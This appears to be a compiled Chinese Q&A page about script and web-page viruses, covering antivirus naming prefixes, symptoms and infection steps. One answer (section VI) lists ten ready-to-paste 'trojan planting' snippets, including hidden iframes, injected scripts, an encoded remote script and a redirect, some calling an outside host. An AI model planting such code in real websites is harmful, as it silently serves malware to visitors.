Ⅰ 什麼是腳本病毒
什麼是惡意腳本?
惡意腳本是指一切以製造危害或者損害系統功能為目的而從軟體系統中增加、改變或刪除的任何腳本。傳統的惡意腳本包括:病毒,蠕蟲,特洛伊木馬,和攻擊性腳本。更新的例子包括: Java攻擊小程序(Java attack applets)和危險的ActiveX控制項。
防治惡意腳本,應該採取以下措施 :
第一,上網時開啟瑞星殺毒軟體的八大監控。
第二,不要輕易瀏覽不良網站。
第三,如果懷疑自己感染了惡意腳本,可以登陸瑞星免費查毒網站,對自己的電腦進行全面掃描。
具體的原理和防範方法到這里去學習下:
http://www.yesky.com/SoftChannel/72356699872165888/20031015/1736105.shtml
Ⅱ 網頁上的病毒常見都有哪些種類,危害都是什麼呢
1、系統病毒
系統病毒的前綴為:Win32、PE、Win95、W32、W95等。這些病毒的一般公有的特性是可以感染windows操作系統的 *.exe 和 *.dll 文件,並通過這些文件進行傳播。如CIH病毒。
2、蠕蟲病毒
蠕蟲病毒的前綴是:Worm。這種病毒的公有特性是通過網路或者系統漏洞進行傳播,很大部分的蠕蟲病毒都有向外發送帶毒郵件,阻塞網路的特性。比如沖擊波(阻塞網路),小郵差(發帶毒郵件) 等。
3、木馬病毒、黑客病毒
木馬病毒其前綴是:Trojan,黑客病毒前綴名一般為 Hack 。木馬病毒的公有特性是通過網路或者系統漏洞進入用戶的系統並隱藏,然後向外界泄露用戶的信息,而黑客病毒則有一個可視的界面,能對用戶的電腦進行遠程式控制制。木馬、黑客病毒往往是成對出現的,即木馬病毒負責侵入用戶的電腦,而黑客病毒則會通過該木馬病毒來進行控制。現在這兩種類型都越來越趨向於整合了。一般的木馬如QQ消息尾巴木馬 Trojan.QQ3344 ,還有大家可能遇見比較多的針對網路游戲的木馬病毒如 Trojan.LMir.PSW.60 。這里補充一點,病毒名中有PSW或者什麼PWD之類的一般都表示這個病毒有盜取密碼的功能(這些字母一般都為「密碼」的英文「password」的縮寫)一些黑客程序如:網路梟雄(Hack.Nether.Client)等。
4、腳本病毒
腳本病毒的前綴是:Script。腳本病毒的公有特性是使用腳本語言編寫,通過網頁進行的傳播的病毒,如紅色代碼(Script.Redlof)。腳本病毒還會有如下前綴:VBS、JS(表明是何種腳本編寫的),如歡樂時光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。
5、宏病毒
其實宏病毒是也是腳本病毒的一種,由於它的特殊性,因此在這里單獨算成一類。宏病毒的前綴是:Macro,第二前綴是:Word、Word97、Excel、Excel97(也許還有別的)其中之一。凡是只感染WORD97及以前版本WORD文檔的病毒採用Word97做為第二前綴,格式是:Macro.Word97;凡是只感染WORD97以後版本WORD文檔的病毒採用Word做為第二前綴,格式是:Macro.Word;凡是只感染EXCEL97及以前版本EXCEL文檔的病毒採用Excel97做為第二前綴,格式是:Macro.Excel97;凡是只感染EXCEL97以後版本EXCEL文檔的病毒採用Excel做為第二前綴,格式是:Macro.Excel,依此類推。該類病毒的公有特性是能感染OFFICE系列文檔,然後通過OFFICE通用模板進行傳播,如:著名的美麗莎(Macro.Melissa)。
6、後門病毒
後門病毒的前綴是:Backdoor。該類病毒的公有特性是通過網路傳播,給系統開後門,給用戶電腦帶來安全隱患。如54很多朋友遇到過的IRC後門Backdoor.IRCBot 。
7、病毒種植程序病毒
這類病毒的公有特性是運行時會從體內釋放出一個或幾個新的病毒到系統目錄下,由釋放出來的新病毒產生破壞。如:冰河播種者(Dropper.BingHe2.2C)、MSN射手(Dropper.Worm.Smibag)等。
8.破壞性程序病毒
破壞性程序病毒的前綴是:Harm。這類病毒的公有特性是本身具有好看的圖標來誘惑用戶點擊,當用戶點擊這類病毒時,病毒便會直接對用戶計算機產生破壞。如:格式化C盤(Harm.formatC.f)、殺手命令(Harm.Command.Killer)等。
9.玩笑病毒
玩笑病毒的前綴是:Joke。也稱惡作劇病毒。這類病毒的公有特性是本身具有好看的圖標來誘惑用戶點擊,當用戶點擊這類病毒時,病毒會做出各種破壞操作來嚇唬用戶,其實病毒並沒有對用戶電腦進行任何破壞。如:女鬼(Joke.Girlghost)病毒。
10.捆綁機病毒
捆綁機病毒的前綴是:Binder。這類病毒的公有特性是病毒作者會使用特定的捆綁程序將病毒與一些應用程序如QQ、IE捆綁起來,表面上看是一個正常的文件,當用戶運行這些捆綁病毒時,會表面上運行這些應用程序,然後隱藏運行捆綁在一起的病毒,從而給用戶造成危害。如:捆綁QQ(Binder.QQPass.QQBin)、系統殺手(Binder.killsys)等。
以上為比較常見的病毒前綴,有時候我們還會看到一些其他的,但比較少見,這里簡單提一下:
DoS:會針對某台主機或者伺服器進行DoS攻擊;
Exploit:會自動通過溢出對方或者自己的系統漏洞來傳播自身,或者他本身就是一個用於Hacking的溢出工具;
HackTool:黑客工具,也許本身並不破壞你的機子,但是會被別人加以利用來用你做替身去破壞別人。
Ⅲ 中了腳本病毒後電腦會有什麼反應
病毒有分類的。
因為破壞力會有區分的,不是什麼大同小異的,但現在的流行病毒已經開始普遍通過E-MAIL MSN QQ等傳播了。
網頁木馬也有很多。
中了病毒,最垃圾的病毒會有進程的,有很高隱蔽性的木馬通常沒有什麼進程(高級的)
現在中了毒就是系統莫名其妙的慢了N多,不能上網了,彈網頁了,叫你安裝什麼東西了,發廣告了等等~~~
反正症狀因病毒不同而不同的了。 你要是想了解更多的就去搜索「 病毒症狀」 或去網路病毒吧去看看吧~~~`我手酸了。
Ⅳ 腳本病毒是 什麼 病毒有什麼危害
腳本病毒的前綴是:Script。腳本病毒的公有特性是使用腳本語言編寫,通過網頁進行的傳播的病毒,如紅色代碼(Script.Redlof)。腳本病毒還會有如下前綴:VBS、JS(表明是何種腳本編寫的),如歡樂時光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。
Ⅳ 什麼是網頁腳本病毒
網頁病毒主要是利用軟體或系統操作平台等的安全漏洞,通過執行嵌入在網頁HTML超文本標記語言內的Java Applet小應用程序,javascript腳本語言程序,ActiveX軟體部件網路交互技術支持可自動執行的代碼程序,以強行修改用戶操作系統的注冊表設置及系統實用配置程序,或非法控制系統資源盜取用戶文件,或惡意刪除硬碟文件、格式化硬碟為行為目標的非法惡意程序。
Ⅵ 如何判斷一段網頁代碼是不是病毒
判斷網頁代碼是不是病毒,第一步:網頁病毒大多由惡意代碼、病毒體(通常是經過偽裝成正常圖片文件後綴的.exe文件)和腳本文件或JAVA小程序組成,病毒製作者將其寫入網頁源文件; 第二步:用戶瀏覽上述網頁,病毒體和腳本文件以及正常的網頁內容一起進入計算機的臨時文件夾; 第三步:腳本文件在顯示網頁內容的同時開始運行,要麼直接運行惡意代碼,要麼直接執行病毒程序,要麼將偽裝的文件還原為.exe文件後再執行,執行任務包括:完成病毒入駐,修改注冊表,嵌入系統進程,修改硬碟分區屬性等; 第四步:網頁病毒完成入侵,在系統重啟後病毒體自我更名、復制、再偽裝,接下來的破壞依病毒的性質正式開始; 註:網頁病毒的工作或稱其為遺傳結構是簡單的,但這便意味著它們能迅速變異。 掛馬代碼如下 一:框架掛馬 <iframe src=地址 width=0 height=0></iframe> 二:js文件掛馬 首先將以下代碼 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存為xxx.js, 則JS掛馬代碼為 <script language=javascript src=xxx.js></script> 三:js變形加密 <SCRIPT language="JScript.Encode" src= http://www.xxx.com/muma.txt> muma.txt可改成任意後綴 四:body掛馬 <body onload="window.location='地址';"></body> 五:隱蔽掛馬 top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src=" http://www.caminix.cn "></iframe>'; 六:css中掛馬 body { background-image: url('javascript:document.write("<script src= http://www.caminix.cn ></script>")')} 七:JAJA掛馬 <SCRIPT language=javascript> window.open (" http://www.caminix.cn ","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script> 八:圖片偽裝 <html> <iframe src="網馬地址" height=0 width=0></iframe> <img src="圖片地址"></center> </html> 九:偽裝調用: <frameset rows="444,0" cols="*"> <frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> <frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> </frameset> 十:高級欺騙 <a href=" http://www.163.com " onMouseOver="www_163_com(); return true;"></a> <SCRIPT Language="JavaScript"> function www_163_com () { var url=" http://www.caminix.cn "; open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,history=yes,width=800,height=600,left=10,top=10"); } </SCRIPT>
滿意請採納
Ⅶ 病毒分類 腳本病毒是啥意思
系統病毒:
系統病毒的前綴為:Win32、PE、Win95、W32、W95等。這些病毒的一般共有的特性是可以感染windows操作系統的 *.exe 和 *.dll 文件,並通過這些文件進行傳播。如CIH病毒。
你這個是木馬的一種(Trojan),而且是JavaScript腳本病毒(Script.JS)
木馬病毒、黑客病毒
木馬病毒其前綴是:Trojan,黑客病毒前綴名一般為 Hack 。木馬病毒的共有特性是通過網路或者系統漏洞進入用戶的系統並隱藏,然後向外界泄露用戶的信息,而黑客病毒則有一個可視的界面,能對用戶的電腦進行遠程式控制制。木馬、黑客病毒往往是成對出現的,即木馬病毒負責侵入用戶的電腦,而黑客病毒則會通過該木馬病毒來進行控制。現在這兩種類型都越來越趨向於整合了。
腳本病毒
腳本病毒的前綴是:Script。腳本病毒的共有特性是使用腳本語言編寫,通過網頁進行的傳播的病毒,如紅色代碼(Script.Redlof)。腳本病毒還會有如下前綴:VBS、JS(表明是何種腳本編寫的),如歡樂時光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。
=======================================================
刪了就好~
有殺毒軟體在就不必太在意~
Ⅷ 計算機病毒的表現現象有哪些
1.引導性病毒
通過軟盤引導傳播的一類病毒,感染磁碟主引導記錄。這種古老的病毒,至今仍在產生破壞。
感染和發作時,往往造成分區表被改寫,造成系統不能啟動或者數據丟失。修改BIOS設置,禁止軟盤引導系統,是防範此類病毒的有效方法。
2.DOS 病毒
只在DOS操作系統傳播,隨著DOS系統的消亡,此類病毒也將失去其生存的土壤。最常用來觀察DOS病毒的方法是執行MEM命令,觀察可用內存空間是否減少。有些病毒會修改config.sys和Autoexec.bat文件。
3.WINDOWS病毒1
通常感染WinPE格式文件,感染後,會經常彈出某文件不是合法的Win32程序,或者系統運行緩慢。系統文件保護功能會警報「系統文件被非法修改」。
4.WINDOWS病毒2
最常被修改的系統文件有config.sys,autoexec.bat,win.sys,winstart.bat,system.ini及注冊表
5.宏病毒
主要感染Microsort Office文檔,Office的宏功能可以完成Office的高級功能,宏使用VBA語言編寫,容易被掌握,在90年代,能否清除宏病毒,成為用戶選擇殺毒軟體的重要理由。
6.腳本病毒
宏病毒和腳本病毒之間只有細微的區別,通常如果該文件隱藏在DOC或XLS中,就是宏病毒,如果是在VBS中,就是腳本病毒。
腳本病毒廣泛存在於Internet網頁中,只要游覽該網頁,就可以下載腳本病毒。腳本病毒通常利用IE瀏覽器的安全漏洞攻擊系統,防範腳本病毒,應該首先修補IE漏洞,對不受信任的Web頁適用較高的安全等級。
腳本病毒破壞後主要的表現是IE主頁被修改,注冊表被修改,重要的系統功能不能使用,惡意腳本甚至可以格式化磁碟
7.蠕蟲病毒及木馬
Worm 是能自動復制和傳播的程序 ,一般蠕蟲不會感染程序,但現在出現了越來越多的混合攻擊型蠕蟲。蠕蟲病毒通常具備極快的傳播速度,比如SQL Server蠕蟲王在數小時內攻擊遍布全球。
通常蠕蟲攻擊可以檢測到異常的數據通信量,有經驗的網管可以通過分析異常數據通信抓包來分析蠕蟲。
特洛伊木馬通常被用來描述這樣一種程序,該程序假裝做一件事的同時,會悄悄的做另一件不被預知的事。現在普遍用它來描述那些不自我復制的惡性病毒。
木馬和蠕蟲一個較大的區別在於,木馬通常不能主動傳播,一般會採取社會工程學欺騙來使自己被執行。木馬通常會有一個伺服器端和客戶端,伺服器端會潛伏在系統中等待客戶端連接,通過特定埠竊取客戶端感興趣的數據。
8.惡作劇和虛假病毒警告
惡作劇程序通常只是達到恐嚇或者就是個小玩笑,這種程序本身對計算機系統不會造成任何問題,只會令使用計算機的人大吃一驚而已。比如女鬼會在屏幕顯示恐怖畫面,播放令人毛骨悚然的音頻文件。
虛假病毒警告——是類似於連環信的郵件或消息,製造者會大肆渲染某種病毒危害,稱其可以達到某種軟體無法辦到的後果。然後在此類消息的末尾通常會告知「請將此消息發給所有聯系人」之類的信息。
Ⅸ 腳本病毒什麼意思
腳本病毒,其前綴是Script,其共有特性是使用腳本語言編寫,通過網頁進行傳播,如紅色代碼(Script.Redlof)。
Ⅹ 電腦中VBS腳本病毒會有什麼現象呢
是病毒引起的,此病毒是這樣運行的。
通過AutoRun.inf指向*********.vbs這個腳本文件,來自動運行病毒,感染全部磁碟根目錄,這些目錄變成快捷方式,再指向那個vbs文件,以後要預防這種病毒
就是要禁用系統的自動運行功能。
此毒中招後的一個顯著特徵是:硬碟各個分區原有的正常文件夾被隱藏,代之以1KB的同名文件夾.lnk文件。誤點擊這些假冒文件夾後,病毒被激活。這是個.vbs+數據流雙料病毒。
到這個網站:
http://www.rensoft.com.cn/zhuansha/kill_folder.html
下載這個專殺工具可恢復所有被隱藏的內容。